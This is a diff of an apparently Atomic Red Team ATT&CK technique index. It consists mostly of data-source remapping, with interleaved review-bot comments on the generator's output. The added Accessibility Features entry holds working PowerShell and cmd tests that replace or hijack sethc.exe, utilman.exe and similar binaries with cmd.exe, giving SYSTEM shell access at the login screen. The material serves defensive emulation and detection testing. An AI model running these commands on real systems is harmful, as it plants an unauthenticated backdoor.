Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), + this focuses solely on API functions intended for processing keystroke data.\n* + Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* + Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) + may provide adversaries with hooks into the operating system of network devices + to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device + Attacks) " + id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + x_mitre_permissions_required: + - Administrator + - root + - SYSTEM + - User x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, @@ -25210,15 +7526,13 @@ collection: keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.' - x_mitre_permissions_required: - - Administrator - - root - - SYSTEM - - User - x_mitre_data_sources: - - Windows Registry - - Process monitoring - - API monitoring + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + - macOS + - Linux + - Network identifier: T1056.001 atomic_tests: - name: Input Capture 
@@ -25366,10 +7680,10 @@ collection: - Eric Kuehn, Secure Ideas - Matthew Demaske, Adaptforward x_mitre_data_sources: - - Windows event logs - - Windows Registry - - Packet capture - - Netflow/Enclave netflow + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Flow' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_permissions_required: - User x_mitre_detection: |- @@ -25410,9 +7724,9 @@ collection: - macOS - Windows x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Access' + - 'File: File Creation' + - 'Command: Command Execution' x_mitre_detection: |- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. @@ -25519,10 +7833,8 @@ collection: x_mitre_platforms: - Windows x_mitre_data_sources: - - Process monitoring - - File monitoring - - Authentication logs - - Mail server + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may 
@@ -25578,8 +7890,21 @@ collection: name: powershell T1185: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2018-01-16T16:13:52.465Z' + modified: '2021-02-09T15:34:09.429Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Man in the Browser + description: |- + Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser) + + A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions) + + Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. 
(Citation: cobaltstrike manual) external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1185 
@@ -25600,41 +7925,26 @@ collection: description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017. source_name: cobaltstrike manual - description: |- - Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser) - - A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions) - - Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. 
(Citation: cobaltstrike manual) - name: Man in the Browser - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-07-14T19:39:44.590Z' - created: '2018-01-16T16:13:52.465Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_contributors: - - Justin Warner, ICEBRG - x_mitre_data_sources: - - Authentication logs - - Packet capture - - Process monitoring - - API monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - Administrator + - SYSTEM x_mitre_detection: This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. - Monitor for process injection against browser applications - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_platforms: - - Windows + Monitor for process injection against browser applications. + x_mitre_data_sources: + - 'Process: Process Access' + - 'Logon Session: Logon Session Creation' + x_mitre_contributors: + - Justin Warner, ICEBRG + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1557: technique: 
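Review bot: Almost all of the churn in the two T1185 hunks (@@ -25578 and @@ -25600) is key reordering, not content: object_marking_refs, created/modified, kill_chain_phases, type, id, name and description move from the bottom of the technique block to the top, while the only real changes are the x_mitre_data_sources rewrite ('Process: Process Access', 'Logon Session: Logon Session Creation') and a trailing period on "Monitor for process injection against browser applications." Have the generator emit keys in a stable order (sorted, or the upstream STIX field order) so that a 17,000-line offset shift (-25578 to +7890) does not bury the handful of substantive changes; as written, nobody can review this diff for correctness. Unrelated to the generator but visible in the moved text: "allows an them to inherit cookies" is an upstream ATT&CK typo and should be reported there rather than patched here.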
@@ -25672,9 +7982,10 @@ collection: MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow. x_mitre_data_sources: - - File monitoring - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Flow' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_permissions_required: - User x_mitre_version: '1.1' @@ -25728,9 +8039,8 @@ collection: modified: '2020-10-22T01:45:55.144Z' created: '2020-10-20T00:08:21.745Z' x_mitre_data_sources: - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_permissions_required: - Administrator x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts 
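Review bot: The T1557 hunk (@@ -25672) lists 'Network Traffic: Network Traffic Flow' twice in x_mitre_data_sources; the old list had three distinct entries (File monitoring, Netflow/Enclave netflow, Packet capture), so one of the duplicates is almost certainly a different upstream data source that got mapped to the same string (my guess would be 'Network Traffic: Network Traffic Content', but verify against the upstream STIX bundle rather than trusting that). Deduplicate in the generator and add a check that fails the build when a technique's data-source list contains repeats, since a mapping-table bug like this will silently reproduce on every run. The following sub-technique hunk (@@ -25728) maps the same three old sources to two new ones without duplication, which is what this one should look like.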
@@ -25766,42 +8076,35 @@ collection: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-09-14T19:48:07.491Z' + modified: '2021-03-08T10:33:02.019Z' created: '2020-03-13T21:14:58.206Z' x_mitre_contributors: - Praetorian - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_detection: |- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Access' + - 'File: File Creation' + - 'Command: Command Execution' x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure atomic_tests: [] T1114.002: technique: - created: '2020-02-19T18:52:24.547Z' - modified: '2020-02-19T20:53:50.908Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - type: attack-pattern id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a - description: Adversaries may target an Exchange server or Office 365 to collect - sensitive information. 
Adversaries may leverage a user's credentials and interact - directly with the Exchange server to acquire information from within a network. - Adversaries may also access externally facing Exchange services or Office - 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) + description: Adversaries may target an Exchange server, Office 365, or Google + Workspace to collect sensitive information. Adversaries may leverage a user's + credentials and interact directly with the Exchange server to acquire information + from within a network. Adversaries may also access externally facing Exchange + services, Office 365, or Google Workspace to access email using credentials + or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords. name: Remote Email Collection created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -25811,19 +8114,25 @@ collection: - source_name: mitre-attack external_id: T1114.002 url: https://attack.mitre.org/techniques/T1114/002 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2021-03-25T13:12:56.909Z' + created: '2020-02-19T18:52:24.547Z' x_mitre_platforms: - Office 365 - Windows + - Google Workspace x_mitre_data_sources: - - Authentication logs - - Email gateway - - Mail server - - Office 365 trace logs + - 'Network Traffic: Network Connection Creation' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).' x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' atomic_tests: [] T1602.001: technique: 
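Review bot: In the T1114.002 hunk (@@ -25811 and the description block before it) every line of the description shows as removed and re-added although the only textual change is the insertion of ", or Google Workspace" in two places; the YAML dumper re-wrapped the paragraph at a different column, so the diff cannot show the word-level change. Configure the dumper with a fixed (or effectively unlimited) line width so long description strings stay on one line and future content edits diff cleanly. The platform change in the preceding sub-technique hunk (@@ -25766), where AWS, GCP and Azure are collapsed into IaaS alongside the 1.0 to 1.1 version bump, is consistent with that technique's modified timestamp moving to 2021-03-08, so that part looks correct; note that the Windows entry also changed position in the list, which is another symptom of the unstable ordering.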
@@ -25878,9 +8187,8 @@ collection: modified: '2020-10-22T01:54:22.812Z' created: '2020-10-19T23:51:05.953Z' x_mitre_data_sources: - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: @@ -25931,9 +8239,8 @@ collection: x_mitre_is_subtechnique: false x_mitre_version: '1.1' x_mitre_data_sources: - - API monitoring - - Process monitoring - - File monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_detection: Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes @@ -26134,9 +8441,8 @@ collection: In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n" x_mitre_data_sources: - - Office 365 audit logs - - Authentication logs - - Application logs + - 'Logon Session: Logon Session Creation' + - 'Application Log: Application Log Content' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: 
@@ -26147,8 +8453,21 @@ collection: atomic_tests: [] T1125: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:31:37.917Z' + modified: '2020-07-14T19:40:47.644Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Video Capture + description: |- + An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. + + Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen. + + In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review) external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1125 
@@ -26159,38 +8478,24 @@ collection: - url: https://objective-see.com/blog/blog_0x25.html description: Patrick Wardle. (n.d.). Retrieved March 20, 2018. source_name: objective-see 2017 review - description: |- - An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. - - Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen. - - In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review) - name: Video Capture - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-07-14T19:40:47.644Z' - created: '2017-05-31T21:31:37.917Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_contributors: - - Praetorian - x_mitre_data_sources: - - Process monitoring - - File monitoring - - API monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Windows + - macOS + x_mitre_permissions_required: + - User x_mitre_detection: |- Detection of this technique may be difficult due to the various APIs that may be used. 
Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system. Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data. - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Windows - - macOS + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Command: Command Execution' + x_mitre_contributors: + - Praetorian + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1056.003: technique: @@ -26225,7 +8530,7 @@ collection: x_mitre_system_requirements: - An externally facing login portal is configured. x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_detection: File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content. @@ -26236,7 +8541,7 @@ collection: - macOS - Windows atomic_tests: [] -defense-evasion: +privilege-escalation: T1548: technique: external_references: @@ -26264,11 +8569,13 @@ defense-evasion: modified: '2020-07-22T21:36:52.825Z' created: '2020-01-30T13:58:14.373Z' x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process command-line parameters - - API monitoring - - Process monitoring + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Process: OS API Execution' x_mitre_permissions_required: - Administrator - User 
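Review bot: The one-line hunk at @@ -26236 renames the section key from defense-evasion: to privilege-escalation:, which silently moves T1548 (and everything that follows it in this section) into a different tactic bucket. T1548 carries both kill-chain phases, so which section it lands in depends on the generator's bucketing rule, and a change in upstream phase order should not reshuffle the index. Confirm whether index.yaml lists multi-tactic techniques under every tactic they belong to or only under one; if only one, document the rule and make it deterministic, and check that the defense-evasion section has not lost T1548 entirely in this commit. The T1056.003 hunk at @@ -26225 (File monitoring to 'File: File Modification') and the T1548 data-source expansion at @@ -26264 are straightforward mappings and look fine.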
@@ -26334,7 +8641,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-04-16T19:37:02.355Z' + modified: '2021-04-24T13:40:52.952Z' created: '2017-12-14T16:46:06.044Z' x_mitre_defense_bypassed: - Windows User Account Control 
@@ -26350,12 +8657,9627 @@ defense-evasion: - Robby Winchester, @robwinchester3 - Jared Atkinson, @jaredcatkinson x_mitre_data_sources: - - Authentication logs - - Windows event logs - - API monitoring - - Access tokens - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Process: Process Metadata' + - 'Process: OS API Execution' + - 'User Account: User Account Metadata' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + x_mitre_detection: "If an adversary is using a standard command-line shell, + analysts can detect token manipulation by auditing command-line activity. + Specifically, analysts should look for use of the runas command. + Detailed command-line logging is not enabled by default in Windows.(Citation: + Microsoft Command-line Logging)\n\nIf an adversary is using a payload that + calls the Windows token APIs directly, analysts can detect token manipulation + only through careful analysis of user network activity, examination of running + processes, and correlation with other endpoint and network behavior. \n\nThere + are many Windows API calls a payload can take advantage of to manipulate access + tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: + Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: + Microsoft ImpersonateLoggedOnUser)). 
Please see the referenced Windows API + pages for more information.\n\nQuery systems for process and thread token + information and look for inconsistencies such as user owns processes impersonating + the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook + for inconsistencies between the various fields that store PPID information, + such as the EventHeader ProcessId from data collected via Event Tracing for + Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID + and ParentProcessID (which are also produced from ETW and other utilities + such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId + identifies the actual parent process." + x_mitre_permissions_required: + - User + - Administrator + x_mitre_effective_permissions: + - SYSTEM + x_mitre_platforms: + - Windows + atomic_tests: [] + T1546.008: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.008 + url: https://attack.mitre.org/techniques/T1546/008 + - external_id: CAPEC-558 + source_name: capec + url: https://capec.mitre.org/data/definitions/558.html + - url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html + description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: + Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.' + source_name: FireEye Hikit Rootkit + - url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom + description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to + the Kingdom. Retrieved July 5, 2017. + source_name: DEFCON2016 Sticky Keys + - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ + description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. + Retrieved November 12, 2014. 
+ source_name: Tilbury 2014 + - source_name: Narrator Accessibility Abuse + url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html + description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' + URI for Fileless Persistence. Retrieved April 28, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Accessibility Features + description: |- + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. + + Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) + + Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). 
(Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. + + For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) + + Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse) + + * On-Screen Keyboard: C:\Windows\System32\osk.exe + * Magnifier: C:\Windows\System32\Magnify.exe + * Narrator: C:\Windows\System32\Narrator.exe + * Display Switcher: C:\Windows\System32\DisplaySwitch.exe + * App Switcher: C:\Windows\System32\AtBroker.exe + id: attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-05-13T20:37:30.048Z' + created: '2020-01-24T14:32:40.315Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - SYSTEM + x_mitre_permissions_required: + - Administrator + x_mitre_detection: Changes to accessibility utility binaries or binary paths + that do not correlate with known software, patch cycles, etc., are suspicious. + Command line invocation of tools capable of modifying the Registry for associated + keys are also suspicious. 
Utility arguments and the binaries themselves should + be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_contributors: + - Paul Speulstra, AECOM Global Security Operations Center + x_mitre_platforms: + - Windows + identifier: T1546.008 + atomic_tests: + - name: Attaches Command Prompt as a Debugger to a List of Target Processes + auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 + description: | + Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. + + Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. + supported_platforms: + - windows + input_arguments: + parent_list: + description: 'Comma separated list of system binaries to which you want + to attach each #{attached_process}. Default: "osk.exe" + +' + type: String + default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, + atbroker.exe + attached_process: + description: 'Full path to process to attach to target in #{parent_list}. 
+ Default: cmd.exe + +' + type: Path + default: C:\windows\system32\cmd.exe + executor: + command: | + $input_table = "#{parent_list}".split(",") + $Name = "Debugger" + $Value = "#{attached_process}" + Foreach ($item in $input_table){ + $item = $item.trim() + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + } + cleanup_command: | + $input_table = "#{parent_list}".split(",") + Foreach ($item in $input_table) + { + $item = $item.trim() + reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null + } + name: powershell + elevation_required: true + - name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: 'Replace sticky keys binary (sethc.exe) with cmd.exe + +' + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + +' + name: command_prompt + elevation_required: true + T1547.014: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.014 + url: https://attack.mitre.org/techniques/T1547/014 + - source_name: Klein Active Setup 2010 + url: https://helgeklein.com/blog/2010/04/active-setup-explained/ + description: Klein, H. (2010, April 22). Active Setup Explained. Retrieved + December 18, 2020. 
+ - source_name: Mandiant Glyer APT 2010 + url: https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf + description: Glyer, C. (2010). Examples of Recent APT Persitence Mechanism. + Retrieved December 18, 2020. + - source_name: Citizenlab Packrat 2015 + url: https://citizenlab.ca/2015/12/packrat-report/ + description: Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved + December 18, 2020. + - source_name: FireEye CFR Watering Hole 2012 + url: https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html + description: Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. + Retrieved December 18, 2020. + - source_name: SECURELIST Bright Star 2015 + url: https://securelist.com/whos-really-spreading-through-the-bright-star/68978/ + description: Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really + Spreading through the Bright Star?. Retrieved December 18, 2020. + - source_name: paloalto Tropic Trooper 2016 + url: https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/ + description: Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese + Government and Fossil Fuel Provider With Poison Ivy. Retrieved December + 18, 2020. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Active Setup + description: |- + Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. 
The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level. + + Adversaries may abuse Active Setup by creating a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016) + + Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. + id: attack-pattern--22522668-ddf6-470b-a027-9d6866679f67 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-03-05T22:36:37.414Z' + created: '2020-12-18T16:33:13.098Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. 
